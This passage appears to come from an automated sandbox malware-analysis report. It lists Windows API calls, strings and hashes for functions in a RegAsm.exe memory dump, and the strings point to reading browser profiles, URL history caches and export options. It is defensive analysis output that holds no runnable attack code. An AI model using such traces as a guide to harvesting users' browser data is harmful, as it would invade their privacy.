                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                          APIs
                          • memset.MSVCRT ref: 00404172
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          • wcscpy.MSVCRT ref: 004041D6
                          • wcscpy.MSVCRT ref: 004041E7
                          • memset.MSVCRT ref: 00404200
                          • memset.MSVCRT ref: 00404215
                          • _snwprintf.MSVCRT ref: 0040422F
                          • wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 0040426E
                          • memset.MSVCRT ref: 004042CD
                          • memset.MSVCRT ref: 004042E2
                          • _snwprintf.MSVCRT ref: 004042FE
                          • wcscpy.MSVCRT ref: 00404311
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                          • API String ID: 2454223109-1580313836
                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                          APIs
                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                          • SetMenu.USER32(?,00000000), ref: 00411453
                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                          • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                          • ShowWindow.USER32(?,?), ref: 004115FE
                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                          • API String ID: 4054529287-3175352466
                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _snwprintf$memset$wcscpy
                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                          • API String ID: 2000436516-3842416460
                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                          APIs
                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                          • String ID:
                          • API String ID: 1043902810-0
                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                          APIs
                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                          • free.MSVCRT ref: 0040E49A
                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                          • memset.MSVCRT ref: 0040E380
                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                          • wcschr.MSVCRT ref: 0040E3B8
                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                          • API String ID: 3849927982-2252543386
                          • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                          • _snwprintf.MSVCRT ref: 0044488A
                          • wcscpy.MSVCRT ref: 004448B4
                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@??3@_snwprintfwcscpy
                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                          • API String ID: 2899246560-1542517562
                          • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                          APIs
                          • memset.MSVCRT ref: 004091E2
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                          • memcmp.MSVCRT ref: 004092D9
                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                          • memcmp.MSVCRT ref: 0040933B
                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                          • memcmp.MSVCRT ref: 00409411
                          • memcmp.MSVCRT ref: 00409429
                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                          • memcmp.MSVCRT ref: 004094AC
                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                          • String ID:
                          • API String ID: 3715365532-3916222277
                          • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          • memset.MSVCRT ref: 004085CF
                          • memset.MSVCRT ref: 004085F1
                          • memset.MSVCRT ref: 00408606
                          • strcmp.MSVCRT ref: 00408645
                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                          • memset.MSVCRT ref: 0040870E
                          • strcmp.MSVCRT ref: 0040876B
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                          • CloseHandle.KERNEL32(?), ref: 004087A6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                          • String ID: ---
                          • API String ID: 3437578500-2854292027
                          • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                          APIs
                          • memset.MSVCRT ref: 0041087D
                          • memset.MSVCRT ref: 00410892
                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                          • GetSysColor.USER32(0000000F), ref: 00410999
                          • DeleteObject.GDI32(?), ref: 004109D0
                          • DeleteObject.GDI32(?), ref: 004109D6
                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                          • String ID:
                          • API String ID: 1010922700-0
                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                          APIs
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                          • malloc.MSVCRT ref: 004186B7
                          • free.MSVCRT ref: 004186C7
                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                          • free.MSVCRT ref: 004186E0
                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                          • malloc.MSVCRT ref: 004186FE
                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                          • free.MSVCRT ref: 00418716
                          • free.MSVCRT ref: 0041872A
                          • free.MSVCRT ref: 00418749
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$FullNamePath$malloc$Version
                          • String ID: |A
                          • API String ID: 3356672799-1717621600
                          • Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                          • API String ID: 2081463915-1959339147
                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                          APIs
                          • GetDC.USER32(00000000), ref: 004121FF
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                          • SelectObject.GDI32(?,?), ref: 00412251
                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                          • SetCursor.USER32(00000000), ref: 004122BC
                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                          • String ID:
                          • API String ID: 1700100422-0
                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                          APIs
                          • GetClientRect.USER32(?,?), ref: 004111E0
                          • GetWindowRect.USER32(?,?), ref: 004111F6
                          • GetWindowRect.USER32(?,?), ref: 0041120C
                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                          • GetWindowRect.USER32(00000000), ref: 0041124D
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                          • String ID:
                          • API String ID: 552707033-0
                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$_snwprintf
                          • String ID: %%0.%df
                          • API String ID: 3473751417-763548558
                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                          APIs
                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                          • KillTimer.USER32(?,00000041), ref: 004060D7
                          • KillTimer.USER32(?,00000041), ref: 004060E8
                          • GetTickCount.KERNEL32 ref: 0040610B
                          • GetParent.USER32(?), ref: 00406136
                          • SendMessageW.USER32(00000000), ref: 0040613D
                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                          • String ID: A
                          • API String ID: 2892645895-3554254475
                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                          • API String ID: 4139908857-2887671607
                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                          APIs
                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                          • strchr.MSVCRT ref: 0040C140
                          • strchr.MSVCRT ref: 0040C151
                          • _strlwr.MSVCRT ref: 0040C15F
                          • memset.MSVCRT ref: 0040C17A
                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                          • String ID: 4$h
                          • API String ID: 4019544885-1856150674
                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                          • String ID: 0$6
                          • API String ID: 4066108131-3849865405
                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                          APIs
                          • memset.MSVCRT ref: 004082EF
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                          • memset.MSVCRT ref: 00408362
                          • memset.MSVCRT ref: 00408377
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$ByteCharMultiWide
                          • String ID:
                          • API String ID: 290601579-0
                          • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                          • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
